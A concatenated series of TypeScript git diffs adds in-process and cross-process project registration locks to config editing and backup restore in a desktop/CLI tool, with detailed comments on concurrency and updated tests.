+      // process registered meanwhile, whether or not this edit touched the project set.
+      yield* Effect.tryPromise({ try: () => lock.assertStillOwned(), catch: (error) => error });
       // Route through the saveConfig Promise facade (not saveConfigEffect) so test
       // spies on saveConfig keep intercepting the serialized write.
       yield* Effect.promise(async () => self.saveConfig(newConfig));
@@ -2636,10 +2633,7 @@ export class Config {
             catch: (error) => error,
           });
           if (registrationLock.kind === "held") {
-            return yield* write(
-              first.newConfig,
-              first.changesProjects ? registrationLock.lock : null
-            );
+            return yield* write(first.newConfig, registrationLock.lock);
           }
           // Changing the project set while a window runs in this process is not allowed:
           // the edit fails the slot before writing and editConfig re-runs it under the full
@@ -2647,9 +2641,11 @@ export class Config {
           if (first.changesProjects && isProjectRegistrationMutexHeld(self.rootDir)) {
             return yield* Effect.fail(new ProjectRegistrationLockRequired());
           }
-          // Under a hold this process already has (a window's), the write is covered.
-          if (isProjectRegistrationFileLockHeld(self.rootDir)) {
-            return yield* write(first.newConfig, null);
+          // Under a hold this process already has (a window's), the write is covered by it
+          // and verified through it.
+          const currentHold = currentProjectRegistrationFileLock(self.rootDir);
+          if (currentHold !== null) {
+            return yield* write(first.newConfig, currentHold);
           }
           // Otherwise the cross-process leg is tried here, inside the queue slot so the edit
           // keeps its order. Held by another process, the edit fails the slot and editConfig
@@ -2662,7 +2658,7 @@ export class Config {
               await using lock = await tryProjectRegistrationFileLock(self.rootDir);
               if (lock === null) throw new ProjectRegistrationLockContended();
               const fresh = transform();
-              await Effect.runPromise(write(fresh.newConfig, fresh.changesProjects ? lock : null));
+              await Effect.runPromise(write(fresh.newConfig, lock));
             },
             catch: (error) => error,
           });

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -86,6 +86,10 @@ import { stripTrailingSlashes } from "@/node/utils/pathUtils";
 import { isProviderAutoRouteEligible } from "@/node/utils/providerRequirements";
 import { getContainerName as getDockerContainerName } from "@/node/runtime/DockerRuntime";
 import { deriveProjectHierarchy } from "@/common/utils/subProjects";
+import {
+  isProjectRegistrationLockHeld,
+  withProjectRegistrationLock,
+} from "@/node/config/projectRegistrationLock";
 import { coerceThinkingLevel, type ThinkingLevel } from "@/common/types/thinking";
 
 // Re-export project/provider types from dedicated schema/types files (for preload usage)
@@ -898,6 +902,25 @@ function normalizeAdvisorPositiveInteger(value: number | null, label: string): n
   return value;
 }
 
+/** Thrown inside the edit queue when a transform changes the project set without the lock. */
+class ProjectRegistrationLockRequired extends Error {
+  constructor() {
+    super("project registration lock required");
+    this.name = "ProjectRegistrationLockRequired";
+  }
+}
+
+function sameProjectKeys(
+  before: ReadonlySet<string>,
+  after: ReadonlyMap<string, unknown>
+): boolean {
+  if (before.size !== after.size) return false;
+  for (const key of after.keys()) {
+    if (!before.has(key)) return false;
+  }
+  return true;
+}
+
 export class Config {
   readonly rootDir: string;
   readonly sessionsDir: string;
@@ -1698,7 +1721,7 @@ export class Config {
           // re-applied on every load, so the identity transform re-reads disk, re-runs them,
           // and persists the migrated form under the queue. One-shot guard: while a persist
           // is in flight, the loads it performs internally must not re-schedule.
-          this.migrationPersist = this.enqueueConfigEdit((migratedConfig) => migratedConfig)
+          this.migrationPersist = this.enqueueConfigEdit((migratedConfig) => migratedConfig, false)
             .catch((error: unknown) => {
               // Keep startup resilient even if persisting migration fails.
               log.warn("Failed to persist migrated config", { error });
@@ -2158,9 +2181,34 @@ export class Config {
    * after the previous edit's write has landed. Without this, concurrent edits
    * (e.g. parallel task launches updating taskStatus) read the same snapshot
    * and the later write silently clobbers the earlier one.
+   *
+   * An edit that adds or removes a project key additionally runs under the project
+   * registration lock (see `withProjectRegistrationLock`), whichever service it comes from,
+   * so a settings-backup restore writing project memory never has the project set change
+   * underneath it. A caller already holding that lock passes `withinRegistrationLock`.
    */
-  async editConfig(fn: (config: ProjectsConfig) => ProjectsConfig): Promise<void> {
-    return this.enqueueConfigEdit(fn);
+  async editConfig(
+    fn: (config: ProjectsConfig) => ProjectsConfig,
+    options: { withinRegistrationLock?: boolean } = {}
+  ): Promise<void> {
+    if (options.withinRegistrationLock === true) return this.enqueueConfigEdit(fn, true);
+    // Free: taken now, around this one edit, whether or not it turns out to change the
+    // project set. The lock's free path runs synchronously, so the edit keeps its place in
+    // the queue relative to edits issued around it.
+    if (!isProjectRegistrationLockHeld(this.rootDir)) {
+      return withProjectRegistrationLock(this.rootDir, () => this.enqueueConfigEdit(fn, true));
+    }
+    // Held (a restore or an import window is running): edits that leave the project set
+    // alone go ahead; one that would change it is refused by the queue before writing and
+    // re-run under the lock once it is released. Its first run was discarded — nothing it
+    // mutated survives, since loadConfigOrDefault parses fresh bytes on every call — and it
+    // waits outside the queue, so no other edit is held up behind it.
+    try {
+      return await this.enqueueConfigEdit(fn, false);
+    } catch (error) {
+      if (!(error instanceof ProjectRegistrationLockRequired)) throw error;
+      return withProjectRegistrationLock(this.rootDir, () => this.enqueueConfigEdit(fn, true));
+    }
   }
 
   getClientConfig() {
@@ -2465,7 +2513,10 @@ export class Config {
    * spied/overridden in tests, and the internally scheduled write is an implementation
    * detail rather than a caller-initiated mutation.
    */
-  private enqueueConfigEdit(fn: (config: ProjectsConfig) => ProjectsConfig): Promise<void> {
+  private enqueueConfigEdit(
+    fn: (config: ProjectsConfig) => ProjectsConfig,
+    withinRegistrationLock: boolean
+  ): Promise<void> {
     // Defer the fiber start to a microtask: Effect.runPromise executes fibers
     // synchronously on the caller's stack until the first async boundary, but the old
     // promise-chain queue always ran edit bodies on a later microtask.
@@ -2474,7 +2525,9 @@ export class Config {
     // assignment, or a load-time migration would schedule its persist twice.
     // Effect failures reject this promise with the raw error (v4 runPromise does not
     // wrap causes), so callers observe the same rejections as before.
-    return Promise.resolve().then(() => Effect.runPromise(this.enqueueConfigEditEffect(fn)));
+    return Promise.resolve().then(() =>
+      Effect.runPromise(this.enqueueConfigEditEffect(fn, withinRegistrationLock))
+    );
   }
 
   /**
@@ -2486,7 +2539,8 @@ export class Config {
    * fiber cancelled while waiting never runs its edit).
    */
   private enqueueConfigEditEffect(
-    fn: (config: ProjectsConfig) => ProjectsConfig
+    fn: (config: ProjectsConfig) => ProjectsConfig,
+    withinRegistrationLock: boolean
   ): Effect.Effect<void, unknown> {
     // eslint-disable-next-line @typescript-eslint/no-this-alias -- Effect.gen generator bodies do not inherit `this`
     const self = this;
@@ -2498,7 +2552,17 @@ export class Config {
           const newConfig = yield* Effect.try({
             try: () => {
               const config = self.loadConfigOrDefault();
+              // Snapshotted before the transform, which usually mutates `config` in place.
+              const projectKeysBefore = new Set(config.projects.keys());
               const newConfig = fn(config);
+              // Before the write, so the permit is released and editConfig retries this edit
+              // under the registration lock; see editConfig.
+              if (
+                !withinRegistrationLock &&
+                !sameProjectKeys(projectKeysBefore, newConfig.projects)
+              ) {
+                throw new ProjectRegistrationLockRequired();
+              }
               // If that load failed, writing would replace the corrupt file with defaults. Only
               // proceed when the bytes on disk right now are the ones with a confirmed sidecar:
               // no confirmed backup, a concurrent replacement since the load, or an unreadable

--- a/src/node/config/projectRegistrationLock.ts
+++ b/src/node/config/projectRegistrationLock.ts
@@ -10,17 +10,18 @@ import { acquireProcessFileLock, type ProcessFileLock } from "@/node/utils/concu
  * would now belong to a different local project) may land underneath it before the memory
  * does.
  *
- * Two legs. The in-process mutex serializes this process's own windows and edits and has a
- * synchronous free path — `Config.editConfig` relies on that so an edit taken under it keeps
- * its place in the config edit queue relative to edits issued around it. The cross-process
- * file lock excludes other processes: config.json is edited by the desktop or server process,
- * but also by standalone CLIs (`mux trust` creates a project entry when the project was never
- * added), each through its own `Config`, and every edit persists the whole file from the bytes
- * it read — so an edit that never touched the project set would still drop a registration
- * another process made in between. `Config.editConfig` therefore takes both legs itself for
- * every edit's read and write, whichever process or service the write comes from. Restore and
- * import windows hold both legs; edits issued inside such a window pass
- * `withinRegistrationLock` and take neither, since neither leg is reentrant.
+ * Two legs. The in-process mutex is taken only by windows — a restore, an import, a
+ * `ProjectService.create`, or a config edit that changes the project set and has to wait for
+ * one — and has a synchronous free path. The cross-process file lock excludes other processes:
+ * config.json is edited by the desktop or server process, but also by standalone CLIs
+ * (`mux trust` creates a project entry when the project was never added), each through its
+ * own `Config`, and every edit persists the whole file from the bytes it read — so an edit that
+ * never touched the project set would still drop a registration another process made in
+ * between. `Config.editConfig` therefore commits every edit only while this process holds the
+ * file lock (`isProjectRegistrationFileLockHeld`): under a window's hold, or under one it
+ * takes for the write itself. Restore and import windows hold both legs; edits issued inside
+ * such a window pass `withinRegistrationLock` and take neither, since neither leg is
+ * reentrant.
  *
  * Registration takes no memory lock and the restore takes this before the memory lock, so
  * the order is fixed.
@@ -76,34 +77,66 @@ export interface ProjectRegistrationLockHandle {
   assertStillOwned(): Promise<void>;
 }
 
-/** Cross-process leg only; the caller must already hold the in-process mutex. */
+/**
+ * Roots whose file lock this process currently holds (a count: a window may hold it while
+ * an edit inside the window is written). What `Config.editConfig` consults at write time —
+ * not whether the mutex is held, which an edit waiting for another process's hold also does
+ * without owning anything yet.
+ */
+const fileLockHolds = new Map<string, number>();
+
+export function isProjectRegistrationFileLockHeld(muxRoot: string): boolean {
+  return (fileLockHolds.get(path.resolve(muxRoot)) ?? 0) > 0;
+}
+
+function recordFileLockHold(muxRoot: string, lock: ProcessFileLock): ProcessFileLock {
+  const key = path.resolve(muxRoot);
+  fileLockHolds.set(key, (fileLockHolds.get(key) ?? 0) + 1);
+  return {
+    assertStillOwned: () => lock.assertStillOwned(),
+    [Symbol.asyncDispose]: async () => {
+      const remaining = (fileLockHolds.get(key) ?? 1) - 1;
+      if (remaining > 0) fileLockHolds.set(key, remaining);
+      else fileLockHolds.delete(key);
+      await lock[Symbol.asyncDispose]();
+    },
+  };
+}
+
+/** Cross-process leg only, waiting for another process's hold; not reentrant. */
 export async function withProjectRegistrationFileLock<T>(
   muxRoot: string,
   fn: (lock: ProjectRegistrationLockHandle) => Promise<T>
 ): Promise<T> {
-  await using lock = await acquireProcessFileLock({
-    lockPath: projectRegistrationLockFilePath(muxRoot),
-    timeoutMs: PROJECT_REGISTRATION_FILE_LOCK_TIMEOUT_MS,
-    label: "project registration lock",
-  });
+  await using lock = recordFileLockHold(
+    muxRoot,
+    await acquireProcessFileLock({
+      lockPath: projectRegistrationLockFilePath(muxRoot),
+      timeoutMs: PROJECT_REGISTRATION_FILE_LOCK_TIMEOUT_MS,
+      label: "project registration lock",
+    })
+  );
   return await fn(lock);
 }
 
 /**
  * The cross-process leg without waiting: the lock, or null when another process holds it.
- * `Config.editConfig` uses this inside its queue slot so an uncontended registration write
- * keeps its place in the edit queue, and only a contended one steps out of the queue to wait.
+ * `Config.editConfig` uses this inside its queue slot so an uncontended write keeps its place
+ * in the edit queue, and only a contended one steps out of the queue to wait.
  */
 export async function tryProjectRegistrationFileLock(
   muxRoot: string
 ): Promise<ProcessFileLock | null> {
   try {
     // The acquisition attempts the link before checking the deadline, so this is one attempt.
-    return await acquireProcessFileLock({
-      lockPath: projectRegistrationLockFilePath(muxRoot),
-      timeoutMs: 1,
-      label: "project registration lock",
-    });
+    return recordFileLockHold(
+      muxRoot,
+      await acquireProcessFileLock({
+        lockPath: projectRegistrationLockFilePath(muxRoot),
+        timeoutMs: 1,
+        label: "project registration lock",
+      })
+    );
   } catch (error) {
     if (error instanceof Error && error.message.startsWith("Timed out acquiring")) return null;
     throw error;

--- a/src/node/config/projectRegistrationLock.ts
+++ b/src/node/config/projectRegistrationLock.ts
@@ -1,5 +1,7 @@
 import * as path from "node:path";
 
+import { acquireProcessFileLock, type ProcessFileLock } from "@/node/utils/concurrency/fileLock";
+
 /**
  * Serializes changes to the set of registered projects with a settings-backup restore that
  * writes project memory. The restore decides which local project each backed-up entry
@@ -8,28 +10,41 @@ import * as path from "node:path";
  * would now belong to a different local project) may land underneath it before the memory
  * does.
  *
- * Every registration change reaches config.json through `Config.editConfig`, which takes
- * this lock itself — so no writer has to know about it, whichever service the write comes
- * from. The restore and the import hold it around their windows; `ProjectService.create`
- * holds it so an import can register inside its own window (`Config.editConfig`'s
- * `withinRegistrationLock` option marks those edits). Registration takes no memory lock and
- * the restore takes this before the memory lock, so the order is fixed.
+ * Two legs. The in-process mutex serializes this process's own windows and edits and has a
+ * synchronous free path — `Config.editConfig` relies on that so an edit taken under it keeps
+ * its place in the config edit queue relative to edits issued around it. The cross-process
+ * file lock excludes other processes' registration writers: config.json is edited by the
+ * desktop or server process, but also by standalone CLIs (`mux trust` creates a project entry
+ * when the project was never added), each through its own `Config`. Every registration change
+ * reaches config.json through `Config.editConfig`, which takes both legs itself whenever a
+ * transform adds or removes a project key — so no writer has to know about them, whichever
+ * process or service the write comes from. Restore and import windows hold both legs; edits
+ * issued inside such a window pass `withinRegistrationLock` and take neither, since neither
+ * leg is reentrant.
  *
- * Not a `MutexMap`: when the lock is free, `fn` runs on the caller's stack. `Config.editConfig`
- * relies on that so an edit taken under the lock keeps its place in the config edit queue
- * relative to edits issued around it; a microtask hop here would reorder them.
- *
- * In-process only, deliberately: config.json is owned by one main process per root, so
- * there is no cross-process writer to exclude, and a restore window can outlast a fail-fast
- * cross-process lock timeout — a registration change should wait for it, not fail.
+ * Registration takes no memory lock and the restore takes this before the memory lock, so
+ * the order is fixed.
  */
 const held = new Map<string, Promise<void>>();
 
-export function isProjectRegistrationLockHeld(muxRoot: string): boolean {
+/**
+ * Bound on waiting for another process's registration hold. A restore window covers the
+ * local write phase only (snapshot, core files, matched memory), normally well under a
+ * second; a CLI hold is a single config write. Generous, because the alternative for the
+ * waiter is to fail an explicit user action.
+ */
+export const PROJECT_REGISTRATION_FILE_LOCK_TIMEOUT_MS = 60_000;
+
+export function projectRegistrationLockFilePath(muxRoot: string): string {
+  return path.join(muxRoot, "locks", "project-registration.lock");
+}
+
+export function isProjectRegistrationMutexHeld(muxRoot: string): boolean {
   return held.has(path.resolve(muxRoot));
 }
 
-export function withProjectRegistrationLock<T>(muxRoot: string, fn: () => Promise<T>): Promise<T> {
+/** In-process leg only; runs `fn` on the caller's stack when the mutex is free. */
+export function withProjectRegistrationMutex<T>(muxRoot: string, fn: () => Promise<T>): Promise<T> {
   const key = path.resolve(muxRoot);
   const previous = held.get(key);
   let release!: () => void;
@@ -47,4 +62,43 @@ export function withProjectRegistrationLock<T>(muxRoot: string, fn: () => Promis
     }
   };
   return previous === undefined ? run() : previous.then(run);
+}
+
+/** Cross-process leg only; the caller must already hold the in-process mutex. */
+export async function withProjectRegistrationFileLock<T>(
+  muxRoot: string,
+  fn: () => Promise<T>
+): Promise<T> {
+  await using _lock = await acquireProcessFileLock({
+    lockPath: projectRegistrationLockFilePath(muxRoot),
+    timeoutMs: PROJECT_REGISTRATION_FILE_LOCK_TIMEOUT_MS,
+    label: "project registration lock",
+  });
+  return await fn();
+}
+
+/**
+ * The cross-process leg without waiting: the lock, or null when another process holds it.
+ * `Config.editConfig` uses this inside its queue slot so an uncontended registration write
+ * keeps its place in the edit queue, and only a contended one steps out of the queue to wait.
+ */
+export async function tryProjectRegistrationFileLock(
+  muxRoot: string
+): Promise<ProcessFileLock | null> {
+  try {
+    // The acquisition attempts the link before checking the deadline, so this is one attempt.
+    return await acquireProcessFileLock({
+      lockPath: projectRegistrationLockFilePath(muxRoot),
+      timeoutMs: 1,
+      label: "project registration lock",
+    });
+  } catch (error) {
+    if (error instanceof Error && error.message.startsWith("Timed out acquiring")) return null;
+    throw error;
+  }
+}
+
+/** Both legs, in the fixed order: the window a restore or import runs in. */
+export function withProjectRegistrationLock<T>(muxRoot: string, fn: () => Promise<T>): Promise<T> {
+  return withProjectRegistrationMutex(muxRoot, () => withProjectRegistrationFileLock(muxRoot, fn));
 }

--- a/src/node/config/projectRegistrationLock.ts
+++ b/src/node/config/projectRegistrationLock.ts
@@ -11,17 +11,19 @@ import { acquireProcessFileLock, type ProcessFileLock } from "@/node/utils/concu
  * does.
  *
  * Two legs. The in-process mutex is taken only by windows — a restore, an import, a
- * `ProjectService.create`, or a config edit that changes the project set and has to wait for
- * one — and has a synchronous free path. The cross-process file lock excludes other processes:
- * config.json is edited by the desktop or server process, but also by standalone CLIs
- * (`mux trust` creates a project entry when the project was never added), each through its
- * own `Config`, and every edit persists the whole file from the bytes it read — so an edit that
- * never touched the project set would still drop a registration another process made in
- * between. `Config.editConfig` therefore commits every edit only while this process holds the
- * file lock (`currentProjectRegistrationFileLock`): under a window's hold, or under one it
- * takes for the write itself, and verifies that hold immediately before saving. Restore and import windows hold both legs; edits issued inside
- * such a window pass `withinRegistrationLock` and take neither, since neither leg is
- * reentrant.
+ * `ProjectService.create` — and orders them fairly within a process; the file lock is what
+ * excludes writers. config.json is edited by the desktop or server process, but also by
+ * standalone CLIs (`mux trust` creates a project entry when the project was never added), each
+ * through its own `Config`, and every edit persists the whole file from the bytes it read — so
+ * an edit that never touched the project set would still drop a registration another process
+ * made in between. `Config.editConfig` therefore commits every edit only under a hold of the
+ * file lock and verifies that hold immediately before saving: the hold an edit takes for
+ * itself, or — for edits issued inside a restore, import, or create window — the window's own,
+ * passed explicitly as `withinRegistrationLock` (neither leg is reentrant, and a hold is never
+ * lent implicitly: a second `Config` instance for the same root has its own edit queue, so
+ * coverage by "some hold in this process" would let its writes race the window's). While a
+ * window holds the lock, other edits in the same process wait for it like edits in any other
+ * process.
  *
  * Registration takes no memory lock and the restore takes this before the memory lock, so
  * the order is fixed.
@@ -38,10 +40,6 @@ export const PROJECT_REGISTRATION_FILE_LOCK_TIMEOUT_MS = 60_000;
 
 export function projectRegistrationLockFilePath(muxRoot: string): string {
   return path.join(muxRoot, "locks", "project-registration.lock");
-}
-
-export function isProjectRegistrationMutexHeld(muxRoot: string): boolean {
-  return held.has(path.resolve(muxRoot));
 }
 
 /** In-process leg only; runs `fn` on the caller's stack when the mutex is free. */
@@ -77,51 +75,16 @@ export interface ProjectRegistrationLockHandle {
   assertStillOwned(): Promise<void>;
 }
 
-/**
- * The file lock this process currently holds per root, as a stack: a window may hold it while
- * an edit inside the window is written. What `Config.editConfig` consults at write time — not
- * whether the mutex is held, which an edit waiting for another process's hold also does
- * without owning anything yet — and the handle it verifies ownership through before saving.
- */
-const fileLockHolds = new Map<string, ProcessFileLock[]>();
-
-/** The hold this process has on the root's file lock, if any: its handle, for ownership checks. */
-export function currentProjectRegistrationFileLock(
-  muxRoot: string
-): ProjectRegistrationLockHandle | null {
-  const holds = fileLockHolds.get(path.resolve(muxRoot));
-  return holds === undefined || holds.length === 0 ? null : holds[holds.length - 1];
-}
-
-function recordFileLockHold(muxRoot: string, lock: ProcessFileLock): ProcessFileLock {
-  const key = path.resolve(muxRoot);
-  const holds = fileLockHolds.get(key) ?? [];
-  holds.push(lock);
-  fileLockHolds.set(key, holds);
-  return {
-    assertStillOwned: () => lock.assertStillOwned(),
-    [Symbol.asyncDispose]: async () => {
-      const remaining = (fileLockHolds.get(key) ?? []).filter((held) => held !== lock);
-      if (remaining.length > 0) fileLockHolds.set(key, remaining);
-      else fileLockHolds.delete(key);
-      await lock[Symbol.asyncDispose]();
-    },
-  };
-}
-
 /** Cross-process leg only, waiting for another process's hold; not reentrant. */
 export async function withProjectRegistrationFileLock<T>(
   muxRoot: string,
   fn: (lock: ProjectRegistrationLockHandle) => Promise<T>
 ): Promise<T> {
-  await using lock = recordFileLockHold(
-    muxRoot,
-    await acquireProcessFileLock({
-      lockPath: projectRegistrationLockFilePath(muxRoot),
-      timeoutMs: PROJECT_REGISTRATION_FILE_LOCK_TIMEOUT_MS,
-      label: "project registration lock",
-    })
-  );
+  await using lock = await acquireProcessFileLock({
+    lockPath: projectRegistrationLockFilePath(muxRoot),
+    timeoutMs: PROJECT_REGISTRATION_FILE_LOCK_TIMEOUT_MS,
+    label: "project registration lock",
+  });
   return await fn(lock);
 }
 
@@ -135,14 +98,11 @@ export async function tryProjectRegistrationFileLock(
 ): Promise<ProcessFileLock | null> {
   try {
     // The acquisition attempts the link before checking the deadline, so this is one attempt.
-    return recordFileLockHold(
-      muxRoot,
-      await acquireProcessFileLock({
-        lockPath: projectRegistrationLockFilePath(muxRoot),
-        timeoutMs: 1,
-        label: "project registration lock",
-      })
-    );
+    return await acquireProcessFileLock({
+      lockPath: projectRegistrationLockFilePath(muxRoot),
+      timeoutMs: 1,
+      label: "project registration lock",
+    });
   } catch (error) {
     if (error instanceof Error && error.message.startsWith("Timed out acquiring")) return null;
     throw error;

--- a/src/node/config/projectRegistrationLock.ts
+++ b/src/node/config/projectRegistrationLock.ts
@@ -1,0 +1,50 @@
+import * as path from "node:path";
+
+/**
+ * Serializes changes to the set of registered projects with a settings-backup restore that
+ * writes project memory. The restore decides which local project each backed-up entry
+ * belongs to at its write boundary, and neither an unregistration (restored notes would land
+ * in a scope no project reads) nor a registration at a backed-up source path (the entry
+ * would now belong to a different local project) may land underneath it before the memory
+ * does.
+ *
+ * Every registration change reaches config.json through `Config.editConfig`, which takes
+ * this lock itself — so no writer has to know about it, whichever service the write comes
+ * from. The restore and the import hold it around their windows; `ProjectService.create`
+ * holds it so an import can register inside its own window (`Config.editConfig`'s
+ * `withinRegistrationLock` option marks those edits). Registration takes no memory lock and
+ * the restore takes this before the memory lock, so the order is fixed.
+ *
+ * Not a `MutexMap`: when the lock is free, `fn` runs on the caller's stack. `Config.editConfig`
+ * relies on that so an edit taken under the lock keeps its place in the config edit queue
+ * relative to edits issued around it; a microtask hop here would reorder them.
+ *
+ * In-process only, deliberately: config.json is owned by one main process per root, so
+ * there is no cross-process writer to exclude, and a restore window can outlast a fail-fast
+ * cross-process lock timeout — a registration change should wait for it, not fail.
+ */
+const held = new Map<string, Promise<void>>();
+
+export function isProjectRegistrationLockHeld(muxRoot: string): boolean {
+  return held.has(path.resolve(muxRoot));
+}
+
+export function withProjectRegistrationLock<T>(muxRoot: string, fn: () => Promise<T>): Promise<T> {
+  const key = path.resolve(muxRoot);
+  const previous = held.get(key);
+  let release!: () => void;
+  const mine = new Promise<void>((resolve) => {
+    release = resolve;
+  });
+  // Recorded before any await, so a second caller arriving meanwhile queues behind us.
+  held.set(key, mine);
+  const run = async (): Promise<T> => {
+    try {
+      return await fn();
+    } finally {
+      release();
+      if (held.get(key) === mine) held.delete(key);
+    }
+  };
+  return previous === undefined ? run() : previous.then(run);
+}

--- a/src/node/config/projectRegistrationLock.ts
+++ b/src/node/config/projectRegistrationLock.ts
@@ -18,8 +18,8 @@ import { acquireProcessFileLock, type ProcessFileLock } from "@/node/utils/concu
  * own `Config`, and every edit persists the whole file from the bytes it read — so an edit that
  * never touched the project set would still drop a registration another process made in
  * between. `Config.editConfig` therefore commits every edit only while this process holds the
- * file lock (`isProjectRegistrationFileLockHeld`): under a window's hold, or under one it
- * takes for the write itself. Restore and import windows hold both legs; edits issued inside
+ * file lock (`currentProjectRegistrationFileLock`): under a window's hold, or under one it
+ * takes for the write itself, and verifies that hold immediately before saving. Restore and import windows hold both legs; edits issued inside
  * such a window pass `withinRegistrationLock` and take neither, since neither leg is
  * reentrant.
  *
@@ -78,25 +78,31 @@ export interface ProjectRegistrationLockHandle {
 }
 
 /**
- * Roots whose file lock this process currently holds (a count: a window may hold it while
- * an edit inside the window is written). What `Config.editConfig` consults at write time —
- * not whether the mutex is held, which an edit waiting for another process's hold also does
- * without owning anything yet.
+ * The file lock this process currently holds per root, as a stack: a window may hold it while
+ * an edit inside the window is written. What `Config.editConfig` consults at write time — not
+ * whether the mutex is held, which an edit waiting for another process's hold also does
+ * without owning anything yet — and the handle it verifies ownership through before saving.
  */
-const fileLockHolds = new Map<string, number>();
+const fileLockHolds = new Map<string, ProcessFileLock[]>();
 
-export function isProjectRegistrationFileLockHeld(muxRoot: string): boolean {
-  return (fileLockHolds.get(path.resolve(muxRoot)) ?? 0) > 0;
+/** The hold this process has on the root's file lock, if any: its handle, for ownership checks. */
+export function currentProjectRegistrationFileLock(
+  muxRoot: string
+): ProjectRegistrationLockHandle | null {
+  const holds = fileLockHolds.get(path.resolve(muxRoot));
+  return holds === undefined || holds.length === 0 ? null : holds[holds.length - 1];
 }
 
 function recordFileLockHold(muxRoot: string, lock: ProcessFileLock): ProcessFileLock {
   const key = path.resolve(muxRoot);
-  fileLockHolds.set(key, (fileLockHolds.get(key) ?? 0) + 1);
+  const holds = fileLockHolds.get(key) ?? [];
+  holds.push(lock);
+  fileLockHolds.set(key, holds);
   return {
     assertStillOwned: () => lock.assertStillOwned(),
     [Symbol.asyncDispose]: async () => {
-      const remaining = (fileLockHolds.get(key) ?? 1) - 1;
-      if (remaining > 0) fileLockHolds.set(key, remaining);
+      const remaining = (fileLockHolds.get(key) ?? []).filter((held) => held !== lock);
+      if (remaining.length > 0) fileLockHolds.set(key, remaining);
       else fileLockHolds.delete(key);
       await lock[Symbol.asyncDispose]();
     },

--- a/src/node/config/projectRegistrationLock.ts
+++ b/src/node/config/projectRegistrationLock.ts
@@ -64,17 +64,29 @@ export function withProjectRegistrationMutex<T>(muxRoot: string, fn: () => Promi
   return previous === undefined ? run() : previous.then(run);
 }
 
+/**
+ * What a holder of the cross-process leg gets to work with. `assertStillOwned` re-reads the
+ * lockfile and throws when this process no longer holds it: a holder frozen past the lease
+ * (a suspended laptop, a stalled event loop) can be judged stale and displaced by another
+ * process, and must not go on committing as if it still held the lock. Called immediately
+ * before every irreversible write made under the lock — a config.json save that changes the
+ * project set, the core restore, each project's memory write.
+ */
+export interface ProjectRegistrationLockHandle {
+  assertStillOwned(): Promise<void>;
+}
+
 /** Cross-process leg only; the caller must already hold the in-process mutex. */
 export async function withProjectRegistrationFileLock<T>(
   muxRoot: string,
-  fn: () => Promise<T>
+  fn: (lock: ProjectRegistrationLockHandle) => Promise<T>
 ): Promise<T> {
-  await using _lock = await acquireProcessFileLock({
+  await using lock = await acquireProcessFileLock({
     lockPath: projectRegistrationLockFilePath(muxRoot),
     timeoutMs: PROJECT_REGISTRATION_FILE_LOCK_TIMEOUT_MS,
     label: "project registration lock",
   });
-  return await fn();
+  return await fn(lock);
 }
 
 /**
@@ -99,6 +111,9 @@ export async function tryProjectRegistrationFileLock(
 }
 
 /** Both legs, in the fixed order: the window a restore or import runs in. */
-export function withProjectRegistrationLock<T>(muxRoot: string, fn: () => Promise<T>): Promise<T> {
+export function withProjectRegistrationLock<T>(
+  muxRoot: string,
+  fn: (lock: ProjectRegistrationLockHandle) => Promise<T>
+): Promise<T> {
   return withProjectRegistrationMutex(muxRoot, () => withProjectRegistrationFileLock(muxRoot, fn));
 }

--- a/src/node/config/projectRegistrationLock.ts
+++ b/src/node/config/projectRegistrationLock.ts
@@ -13,14 +13,14 @@ import { acquireProcessFileLock, type ProcessFileLock } from "@/node/utils/concu
  * Two legs. The in-process mutex serializes this process's own windows and edits and has a
  * synchronous free path — `Config.editConfig` relies on that so an edit taken under it keeps
  * its place in the config edit queue relative to edits issued around it. The cross-process
- * file lock excludes other processes' registration writers: config.json is edited by the
- * desktop or server process, but also by standalone CLIs (`mux trust` creates a project entry
- * when the project was never added), each through its own `Config`. Every registration change
- * reaches config.json through `Config.editConfig`, which takes both legs itself whenever a
- * transform adds or removes a project key — so no writer has to know about them, whichever
- * process or service the write comes from. Restore and import windows hold both legs; edits
- * issued inside such a window pass `withinRegistrationLock` and take neither, since neither
- * leg is reentrant.
+ * file lock excludes other processes: config.json is edited by the desktop or server process,
+ * but also by standalone CLIs (`mux trust` creates a project entry when the project was never
+ * added), each through its own `Config`, and every edit persists the whole file from the bytes
+ * it read — so an edit that never touched the project set would still drop a registration
+ * another process made in between. `Config.editConfig` therefore takes both legs itself for
+ * every edit's read and write, whichever process or service the write comes from. Restore and
+ * import windows hold both legs; edits issued inside such a window pass
+ * `withinRegistrationLock` and take neither, since neither leg is reentrant.
  *
  * Registration takes no memory lock and the restore takes this before the memory lock, so
  * the order is fixed.

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -634,6 +634,8 @@ describe("backup adapters", () => {
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
     expect(restored.changedFiles).toEqual(["skills/demo/run.sh"]);
     const mode = (await fs.stat(path.join(muxRoot, "skills/demo/run.sh"))).mode;
@@ -676,6 +678,8 @@ describe("backup adapters", () => {
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -761,6 +765,8 @@ describe("backup adapters", () => {
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("canonical\n");
@@ -816,6 +822,8 @@ describe("backup adapters", () => {
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("canonical\n");
@@ -873,6 +881,8 @@ describe("backup adapters", () => {
       repositoryRoot: prepared.rootDir,
       managedPath: prepared.managedPath,
       includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
